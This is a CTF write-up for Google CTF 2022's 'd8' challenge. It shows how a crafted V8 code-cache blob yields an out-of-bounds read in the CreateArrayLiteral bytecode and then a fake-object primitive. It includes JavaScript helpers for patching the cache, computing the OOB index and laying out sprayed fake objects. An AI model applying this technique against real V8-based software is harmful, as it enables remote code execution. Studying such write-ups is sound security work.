Google CTF 2022 d8: From V8 Bytecode to Code Execution
This weekend I played Google CTF with r3kapig. On the first day I tried the OCR challenge but failed to solve it; on the second day I spent the whole day on d8, which is closer to what I am familiar with. I finally solved it around midnight, taking second blood. The challenge is quite interesting, so it is worth a write-up.
0x00 Overview
In this challenge, we need to exploit runner.cc, which takes binary input, passes it to v8::ScriptCompiler::CachedData, and executes the result. After some investigation, we found that this lets us execute arbitrary V8 bytecode. It turns out that V8 bytecode execution has many out-of-bounds (OOB) primitives that can be exploited, because V8 treats bytecode as trusted input. The final solution uses an OOB read in CreateArrayLiteral to fetch a fake ArrayBoilerplateDescription, leading to an object-faking primitive and then to code execution with regular exploitation techniques.
0x01 V8 Code Caching
More information about this can be found here and here. In short, code caching lets V8 avoid parsing and compiling the same script repeatedly. When a JavaScript script is compiled, V8 can generate a cache that stores the compilation result; when the same script is encountered again, this cache is used instead of recompiling it.
Generating Code Cache
According to the documentation linked above, we should use v8::ScriptCompiler::kProduceCodeCache or v8::ScriptCompiler::GetCodeCache to generate a cache for the script being compiled. However, neither of them exists in the given V8 version. After checking test-api.cc, we found that v8::ScriptCompiler::CreateCodeCache is what generates the code cache for a script that has just been compiled and executed; in other words, the documentation is out of date here. Note that CreateCodeCache must be called after script->Run(context); otherwise, the bytecode of lazily compiled functions is missing from the cache.
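The ordering issue can be reproduced without building gen.cc, because Node.js exposes the same V8 code cache through its vm module. The sketch below is an analogue, not the author's gen.cc: it assumes a CommonJS Node.js script, and my understanding (not verified against this exact Node version) is that script.createCachedData() is backed by V8's ScriptCompiler::CreateCodeCache. It creates one cache before running the script and one after, then consumes the second.

```javascript
// Analogue of the gen.cc workflow using Node.js's vm module (assumes a
// CommonJS Node.js script). createCachedData() serializes V8's code cache.
const vm = require("vm");

const source = `
function add(a, b) {
  return a + b;
}
globalThis.result = add(1, 2);
`;

const script = new vm.Script(source);

// Created before running: add() has not been compiled yet, so the cache only
// marks it for compilation on first invocation.
const cacheBeforeRun = script.createCachedData();

script.runInThisContext();

// Created after running: add() has been compiled and its bytecode is included.
const cacheAfterRun = script.createCachedData();

// Consuming a cache: V8 sanity-checks it against the supplied source and
// reports a failed check through cachedDataRejected.
const reloaded = new vm.Script(source, { cachedData: cacheAfterRun });

console.log("cache before run:", cacheBeforeRun.length, "bytes");
console.log("cache after run: ", cacheAfterRun.length, "bytes");
console.log("rejected:", reloaded.cachedDataRejected);
```

Passing a cache together with the source it is checked against is the Node.js counterpart of runner.cc supplying its (empty) script string; a failed check, such as a mismatched source hash, shows up as cachedDataRejected being true.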
In addition, v8::V8::SetFlagsFromCommandLine can be used to enable natives syntax such as %DebugPrint, which makes debugging much more convenient. Because %DebugPrint is compiled into the V8 bytecode stored in the code cache, its output is still shown when the cache is executed by runner.cc.
Another thing to note is that runner.cc also provides an empty script string when it loads the cache. The cache loader checks whether the source hash stored in the binary cache matches the hash of the provided script and rejects the cache if it does not. After some debugging, we found that the hash of the empty script is 0 and that the hash in the binary cache is the 4 bytes at offset +8. Therefore, we set this field to 0 so that the cache is accepted.
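Zeroing the hash is a single 32-bit write. The sketch below assumes, as found above for this V8 build, that the source hash is the 32-bit field at offset +8, and that the blob was produced on a little-endian (x86-64) machine; zeroSourceHash and readSourceHash are hypothetical helper names, not the author's tooling. It only uses DataView, so it runs in Node.js or d8.

```javascript
// Hypothetical helpers: zero the source-hash field of a V8 code-cache blob so
// that it matches the empty source string supplied by runner.cc.
// Assumptions: the field is a 32-bit value at byte offset 8, and the blob was
// produced on a little-endian machine (x86-64).
const SOURCE_HASH_OFFSET = 8;

function readSourceHash(blob) {
  const view = new DataView(blob.buffer, blob.byteOffset, blob.byteLength);
  return view.getUint32(SOURCE_HASH_OFFSET, /* littleEndian */ true);
}

function zeroSourceHash(blob) {
  if (blob.byteLength < SOURCE_HASH_OFFSET + 4) {
    throw new RangeError("blob too short to contain a source hash");
  }
  const patched = new Uint8Array(blob); // copy; leave the input untouched
  new DataView(patched.buffer).setUint32(SOURCE_HASH_OFFSET, 0, true);
  return patched;
}

// Demo on a synthetic 16-byte "header" whose hash field is 0x1234.
const fake = new Uint8Array(16);
new DataView(fake.buffer).setUint32(SOURCE_HASH_OFFSET, 0x1234, true);
const patched = zeroSourceHash(fake);
console.log(readSourceHash(fake).toString(16), "->", readSourceHash(patched));
```

For the real blob, read ./blob.bin into a Uint8Array (for example with Node's fs.readFileSync), pass it through zeroSourceHash, and write the result back.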
Also, a cache generated by a debug build cannot be used by a release build, and vice versa; it will be rejected. In the debug build, the flag FLAG_verify_snapshot_checksum is set, which performs an additional checksum check; to disable it, we manually set this flag to false in SerializedCodeData::SanityCheckWithoutSource.
At this point we can generate, from our JavaScript code, a cache that runner.cc can run. The full code for this is here. Running ./gen exp.js --allow-natives-syntax --print-bytecode compiles the JavaScript into a cache and stores the binary cache in ./blob.bin. We pass --print-bytecode to see the V8 bytecode being generated; the same bytecode can also be found in the generated cache.
0x02 Exploiting V8 Bytecode
Initially we wondered whether the raw machine code generated by the JIT is also stored in the cache; if so, we could execute shellcode directly by modifying it in the cache. However, after some trials, it turned out that things are not that easy. Therefore, we decided to build the exploit on V8 bytecode instead.
Arbitrarily modifying the bytecode easily crashes V8. I came up with several exploitation ideas, but in the end only the last one worked for me.
- Use bytecode to leak the hole into JavaScript, an exploitation primitive that has been used before. However, according to my friend sakura, this primitive is already mitigated in the current version, so I did not spend much time on it, although it could potentially work.
- When V8 bytecode accesses an argument register, the instruction contains an index byte. Modifying this byte causes an OOB access. However, after further investigation, the OOB access happens on the stack, and the data behind it is not easily controllable. In addition, the arguments are stored as full 64-bit pointers rather than compressed pointers, so it is hard to exploit by simply writing Smi numbers to the stack. Therefore, this idea does not work.
- We found that CreateArrayLiteral also has an index operand that is used to access a FixedArray in OldSpace. The value fetched is a pointer to an ArrayBoilerplateDescription, which describes how the array is initialized. By controlling the content after the FixedArray, we can fake such an ArrayBoilerplateDescription instance and thus obtain an object-faking primitive. From there, the exploitation is regular.
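Why a trusted index operand turns into an OOB read can be shown with a toy model. The sketch below is a simplified simulation, not V8 code: the heap is an array of 32-bit words, a FixedArray is a map word and a length word followed by its elements (roughly its shape under pointer compression), and loadTrusted mimics an interpreter that, in this build, effectively skips the bounds check on the operand. All addresses and values are made up, apart from the map value borrowed from the dump shown later.

```javascript
// Toy model (not V8 code): a heap of 32-bit words with compressed "pointers".
// A FixedArray is laid out as [map, length, element0, element1, ...].
const heap = new Uint32Array(16);

// Hypothetical FixedArray at word 2 with length 1, like the constant pool.
const CONSTANT_POOL = 2;
heap[CONSTANT_POOL] = 0x2239;     // map word (low bits of the FixedArray map)
heap[CONSTANT_POOL + 1] = 1;      // length (stored raw here, not as a Smi)
heap[CONSTANT_POOL + 2] = 0xaaaa; // element 0: the legitimate boilerplate

// Whatever happens to follow the FixedArray, e.g. attacker-shaped data.
heap[CONSTANT_POOL + 3] = 0x41414141;

// A bounds-checked load, as ordinary runtime code would do it.
function loadChecked(heap, array, index) {
  const length = heap[array + 1];
  if (index >= length) throw new RangeError(`index ${index} >= length ${length}`);
  return heap[array + 2 + index];
}

// An interpreter that trusts its bytecode operands effectively does this:
function loadTrusted(heap, array, index) {
  return heap[array + 2 + index]; // no comparison against the length word
}

console.log(loadTrusted(heap, CONSTANT_POOL, 0).toString(16)); // aaaa
console.log(loadTrusted(heap, CONSTANT_POOL, 1).toString(16)); // 41414141
```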
CreateArrayLiteral
This bytecode is used to create JavaScript arrays. Let's write some test code to see how it works.
function foo()
{
const o = [[], 1.1, 0x123];
return o[0];
}
foo();
readline();
// ./d8 test.js --print-bytecode
Here is the bytecode generated for the foo function:
79 00 00 04 CreateArrayLiteral [0], [0], #4
c4 Star0
0c LdaZero
2f fa 01 GetKeyedProperty r0, [1]
a9 Return
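The hex column of this listing is the raw bytecode. As a sketch, assuming the single-byte (non-Wide) operand encoding and the opcode value 0x79 printed for this particular build (opcode numbers are not stable across V8 versions), the first instruction decodes into an opcode followed by three one-byte operands: constant pool index, feedback slot, and flags. decodeCreateArrayLiteral is a hypothetical helper.

```javascript
// Hypothetical decoder for a single, non-Wide CreateArrayLiteral instruction.
// Assumption: opcode 0x79, as printed by --print-bytecode for this V8 build.
const CREATE_ARRAY_LITERAL = 0x79;

function decodeCreateArrayLiteral(bytes, offset = 0) {
  if (bytes[offset] !== CREATE_ARRAY_LITERAL) {
    throw new Error(`expected opcode 0x79 at offset ${offset}`);
  }
  if (offset + 4 > bytes.length) {
    throw new RangeError("truncated instruction");
  }
  return {
    constantPoolIndex: bytes[offset + 1], // the first [0] in the listing
    feedbackSlot: bytes[offset + 2],      // the second [0]
    flags: bytes[offset + 3],             // #4
    length: 4,                            // opcode + three 1-byte operands
  };
}

// Bytes of foo() from the listing.
const fooBytecode = Uint8Array.from([
  0x79, 0x00, 0x00, 0x04, // CreateArrayLiteral [0], [0], #4
  0xc4,                   // Star0
  0x0c,                   // LdaZero
  0x2f, 0xfa, 0x01,       // GetKeyedProperty r0, [1]
  0xa9,                   // Return
]);

console.log(decodeCreateArrayLiteral(fooBytecode));
```

The constantPoolIndex byte is the operand that the exploit later rewrites.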
As shown, the instruction CreateArrayLiteral [0], [0], #4 is generated for the array creation. The question is: how does the interpreter know which elements to put into the array? The answer lies in the first [0] operand of CreateArrayLiteral. This value is used as an index into a FixedArray (the function's constant pool), which is printed below the bytecode.
0x1b1f00253b31: [FixedArray] in OldSpace
- map: 0x1b1f00002239 <Map>
- length: 1
0: 0x1b1f00253b25 <ArrayBoilerplateDescription PACKED_ELEMENTS, 0x1b1f00253af9 <FixedArray[3]>>
Index 0 refers to an ArrayBoilerplateDescription instance, which describes how the array elements are initialized. Let's see what information it contains.
pwndbg> job 0x1b1f00253b25
0x1b1f00253b25: [ArrayBoilerplateDescription] in OldSpace
- map: 0x1b1f000033f5 <Map[12]>
- elements kind: PACKED_ELEMENTS
- constant elements: 0x1b1f00253af9 <FixedArray[3]>
pwndbg> job 0x1b1f00253af9
0x1b1f00253af9: [FixedArray] in OldSpace
- map: 0x1b1f00002239 <Map>
- length: 3
0: 0x1b1f00253b0d <ArrayBoilerplateDescription PACKED_SMI_ELEMENTS, 0x1b1f00002261 <FixedArray[0]>>
1: 0x1b1f00253b19 <HeapNumber 1.1>
2: 291
pwndbg> p/x 291
$1 = 0x123
The ArrayBoilerplateDescription instance contains a constant elements field, which points to another FixedArray holding the elements used to initialize the newly created array. Interestingly, the first element is a pointer to another ArrayBoilerplateDescription rather than to a JSArray. This makes sense: each time the array literal is evaluated, a new inner JSArray should be created instead of reusing a reference to an old one.
An important question is: if we can fake the ArrayBoilerplateDescription instance used by CreateArrayLiteral, do we get an object-faking primitive? After manually changing a pointer inside the constant elements to point to an existing JavaScript object, the answer turns out to be yes. The next question, therefore, is how to fake the ArrayBoilerplateDescription via an OOB read in the CreateArrayLiteral instruction.
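The behaviour described in the last two paragraphs can be captured in a deliberately simplified model. This is not V8's implementation, which involves allocation sites and boilerplate copying; BoilerplateDescription and createArrayLiteral are hypothetical names. Nested descriptions become fresh arrays on every evaluation, while any other entry is copied into the result as-is, mirroring the observation above that a pointer planted in constant elements ends up in the new array.

```javascript
// Toy model (hypothetical names, not V8's implementation) of how
// CreateArrayLiteral turns an ArrayBoilerplateDescription into an array.
class BoilerplateDescription {
  constructor(elementsKind, constantElements) {
    this.elementsKind = elementsKind;         // e.g. "PACKED_ELEMENTS"
    this.constantElements = constantElements; // initial values
  }
}

function createArrayLiteral(desc) {
  // Nested descriptions become brand-new arrays on every evaluation;
  // everything else is copied into the result as-is.
  return desc.constantElements.map((entry) =>
    entry instanceof BoilerplateDescription ? createArrayLiteral(entry) : entry
  );
}

// Mirrors `[[], 1.1, 0x123]` from foo().
const fooLiteral = new BoilerplateDescription("PACKED_ELEMENTS", [
  new BoilerplateDescription("PACKED_SMI_ELEMENTS", []),
  1.1,
  0x123,
]);

const first = createArrayLiteral(fooLiteral);
const second = createArrayLiteral(fooLiteral);
console.log(first[0] !== second[0]); // true: inner arrays are fresh

// If an attacker controls constantElements, the chosen value comes back out.
const someObject = { marker: "chosen by the attacker" };
const tampered = new BoilerplateDescription("PACKED_ELEMENTS", [someObject]);
console.log(createArrayLiteral(tampered)[0] === someObject); // true
```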
Controlling Memory after FixedArray
Since the FixedArray is in OldSpace, an intuitive approach is to create an Array with double elements, trigger garbage collection to move it into OldSpace, and check whether the array elements end up in memory after the FixedArray (i.e., the OOB read victim). However, the element content turned out to be too far away from the FixedArray, so this approach does not work.
Then we noticed that the content of constant elements is very close to the FixedArray, but located before it rather than after it. However, if we create another function that also contains a CreateArrayLiteral instruction, its constant elements can reside after the victim FixedArray, as long as that function is declared after the victim function. Moreover, if the created array contains only double elements, its constant elements is a FixedDoubleArray, which stores unboxed doubles in memory, so we can fully control the memory content after the victim FixedArray!
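Because a FixedDoubleArray stores raw IEEE-754 bits, any pair of 32-bit words can be planted by choosing the right double. The helpers below (hypothetical names) convert between a (low, high) word pair and a double on a little-endian host and render the double as a literal that round-trips through JavaScript source. Putting the same compressed pointer in both halves, so that a 4-byte-granular index hits it whichever half it lands on, is my own suggestion rather than something stated above. Pairs whose high word has all exponent bits set encode Infinity or NaN, which cannot be written as plain numeric literals and whose NaN payloads V8 may canonicalize, so the helper rejects them.

```javascript
// Helpers (hypothetical names) for planting 32-bit words through unboxed
// doubles. Assumes a little-endian host, where the low word comes first.
const scratch = new DataView(new ArrayBuffer(8));

function wordsToDouble(low, high) {
  if ((high & 0x7ff00000) === 0x7ff00000) {
    // Exponent all ones: Infinity or NaN. These cannot be written as a plain
    // numeric literal, and NaN payloads may be canonicalized.
    throw new RangeError("word pair encodes Infinity/NaN");
  }
  scratch.setUint32(0, low >>> 0, true);
  scratch.setUint32(4, high >>> 0, true);
  return scratch.getFloat64(0, true);
}

function doubleToWords(value) {
  scratch.setFloat64(0, value, true);
  return [scratch.getUint32(0, true), scratch.getUint32(4, true)];
}

// Render a double so it survives a round trip through JavaScript source
// (String(-0) would lose the sign bit).
function toLiteral(value) {
  return Object.is(value, -0) ? "-0" : String(value);
}

// Spray: the same (made-up) tagged compressed pointer in both halves, so an
// OOB index landing on either 4-byte slot reads the same value.
const fakeDescPtr = 0x08040121;
const sprayValue = wordsToDouble(fakeDescPtr, fakeDescPtr);
const sprayLiteral = `[${Array(4).fill(toLiteral(sprayValue)).join(", ")}]`;
console.log(sprayLiteral);
```

The printed literal can be pasted into the array literal of the spraying function declared after the victim function.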
The specific OOB index was found through debugging and trial and error. We first fill the unboxed doubles with 'A' bytes (0x41), and then inspect the memory after the victim FixedArray in the gen.cc process (debug build). Note that we cannot do this in runner.cc, because we cannot print the bytecode there; fortunately, the memory layout is very similar in both. From this, we calculate an index value, write it into the index operand of the CreateArrayLiteral instruction, and run the challenge binary with the modified cache. If it crashes at an address of the form 0x????41414141, the index is valid for the OOB access.
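Once the marker has been located, the index is simple arithmetic. A sketch, assuming pointer compression (4-byte tagged slots), a FixedArray header of two slots (map and length), and tagged addresses with the low bit set; oobIndex is a hypothetical helper. The FixedArray address is the compressed (low 32-bit) part of the constant pool address from the dump above, while the marker address is made up. The result must also fit the operand width of the instruction being patched: one byte for the non-Wide form in the listing.

```javascript
// Hypothetical helper: compute the CreateArrayLiteral constant-pool index that
// makes the interpreter read the 4-byte slot at targetAddr.
// Assumptions: pointer compression (4-byte slots), FixedArray header =
// map + length (8 bytes), addresses given as low 32 bits.
const TAGGED_SIZE = 4;
const FIXED_ARRAY_HEADER_SIZE = 2 * TAGGED_SIZE;

function oobIndex(fixedArrayTagged, targetAddr, maxOperand = 0xff) {
  const untagged = (fixedArrayTagged & ~1) >>> 0; // clear the heap-object tag
  const elementsStart = untagged + FIXED_ARRAY_HEADER_SIZE;
  const delta = targetAddr - elementsStart;
  if (delta < 0 || delta % TAGGED_SIZE !== 0) {
    throw new RangeError("target is before the elements or misaligned");
  }
  const index = delta / TAGGED_SIZE;
  if (index > maxOperand) {
    throw new RangeError(`index ${index} does not fit the operand`);
  }
  return index;
}

// Constant pool from the dump: 0x1b1f00253b31 -> compressed 0x00253b31.
// Suppose the 0x41414141 marker was seen at 0x00253f00 (made-up address).
console.log(oobIndex(0x00253b31, 0x00253f00)); // 242
```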
Final Exploit
At this point the exploitation steps should be clear:
- Prepare a large double array; the low 32 bits of its element address are fixed (V8 pointer compression). This array is used to hold the fake instances, such as ArrayBoilerplateDescription, FixedArray, Uint32Array, etc.
- Spray the low 32 bits of the address of the large array's elements as FixedDoubleArray content after the FixedArray used as the OOB read victim. Inside the large array, fake the ArrayBoilerplateDescription (note that in pointer compression mode, the low 32 bits of pointers to built-in instances such as Map are fixed).
- Call the victim function, whose CreateArrayLiteral instruction has been modified beforehand to cause the OOB read, and return the element as the fake object.
- Once we have the fake object, the exploitation is very regular, so I will not discuss it here.
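To make the second step more concrete, here is a sketch of how the fake ArrayBoilerplateDescription and the FixedArray it points to could be laid out as 32-bit words and packed into doubles for the large array. Everything here is an assumption for illustration: the map values are the low 32 bits printed in the dumps above for that build, the field order (map, elements-kind Smi, constant elements) follows the order in which job prints them, Smis are 31-bit values shifted left by one under pointer compression, PACKED_ELEMENTS is elements kind 2, and the elements base address and target object pointer are made up. layoutFakeObjects is a hypothetical helper, not part of the author's exploit.

```javascript
// Hypothetical layout of the fake objects inside the large double array.
// All constants below are assumptions for a specific build (see lead-in).
const ABD_MAP = 0x000033f5;         // ArrayBoilerplateDescription map (dump)
const FIXED_ARRAY_MAP = 0x00002239; // FixedArray map (dump)
const PACKED_ELEMENTS = 2;

const smi = (n) => (n << 1) >>> 0;      // 31-bit Smi under pointer compression
const tag = (addr) => (addr | 1) >>> 0; // heap object pointers have low bit set

const f64 = new Float64Array(1);
const u32 = new Uint32Array(f64.buffer); // little-endian host assumed

// elementsBase: address (low 32 bits) of the first double of the large array.
function layoutFakeObjects(elementsBase, targetObjectPtr) {
  // Fake ABD at elementsBase (12 bytes, padded to 16 so the next object
  // starts on a double boundary), fake FixedArray right after it.
  const fakeFixedArrayAddr = elementsBase + 16;
  const words = [
    ABD_MAP, smi(PACKED_ELEMENTS), tag(fakeFixedArrayAddr), 0,
    FIXED_ARRAY_MAP, smi(1), targetObjectPtr, 0,
  ];
  const doubles = [];
  for (let i = 0; i < words.length; i += 2) {
    u32[0] = words[i];     // low half of the double
    u32[1] = words[i + 1]; // high half
    doubles.push(f64[0]);
  }
  return { fakeAbdPtr: tag(elementsBase), doubles };
}

// Made-up addresses: the large array's elements and the (tagged) object we
// want CreateArrayLiteral to hand back as element 0.
const { fakeAbdPtr, doubles } = layoutFakeObjects(0x08300000, 0x08412345);
console.log(fakeAbdPtr.toString(16), doubles);
```

In this layout, fakeAbdPtr is the value that would be sprayed after the victim FixedArray, and the doubles would be written into the large array starting at its first element.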
The full exploit is here. We first compile the exploit into a cache binary, then use the Python script to locate and modify the CreateArrayLiteral instruction, and finally feed the modified cache to the challenge binary as the final exploit.
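The Python patching script itself is not reproduced here. As a rough JavaScript equivalent, the function below searches a cache blob for the 4-byte CreateArrayLiteral instruction produced for the victim function and rewrites only its constant-pool index byte. Assumptions: opcode 0x79, non-Wide operands (so the new index must stay below 256 and the instruction length, and therefore every offset in the blob, is unchanged), a pattern that matches exactly once, and a target build that does not verify the cache checksum (the write-up only mentions that check for the debug build). patchCreateArrayLiteral is a hypothetical name. Matching the full original instruction bytes rather than the opcode alone reduces the chance of hitting an unrelated 0x79 byte.

```javascript
// Hypothetical re-implementation of the cache-patching step: find the
// victim's CreateArrayLiteral instruction and replace its index operand.
function findAll(haystack, needle) {
  const hits = [];
  outer: for (let i = 0; i + needle.length <= haystack.length; i++) {
    for (let j = 0; j < needle.length; j++) {
      if (haystack[i + j] !== needle[j]) continue outer;
    }
    hits.push(i);
  }
  return hits;
}

function patchCreateArrayLiteral(blob, original, newIndex) {
  // original: the 4 bytes printed by --print-bytecode, e.g. [0x79, 0, 0, 4].
  if (original.length !== 4 || original[0] !== 0x79) {
    throw new Error("expected a non-Wide CreateArrayLiteral (opcode 0x79)");
  }
  if (!Number.isInteger(newIndex) || newIndex < 0 || newIndex > 0xff) {
    throw new RangeError("index must fit in a single-byte operand");
  }
  const hits = findAll(blob, original);
  if (hits.length !== 1) {
    throw new Error(`expected exactly one match, found ${hits.length}`);
  }
  const patched = new Uint8Array(blob); // copy; same length as the input
  patched[hits[0] + 1] = newIndex;      // byte after the opcode = index
  return { offset: hits[0], patched };
}

// Demo on a synthetic blob that embeds foo()'s first instruction.
const blob = Uint8Array.from([0xde, 0xad, 0x79, 0x00, 0x00, 0x04, 0xc4, 0xa9]);
const { offset, patched } = patchCreateArrayLiteral(blob, [0x79, 0x00, 0x00, 0x04], 242);
console.log(offset, Array.from(patched.slice(2, 6), (b) => b.toString(16)));
```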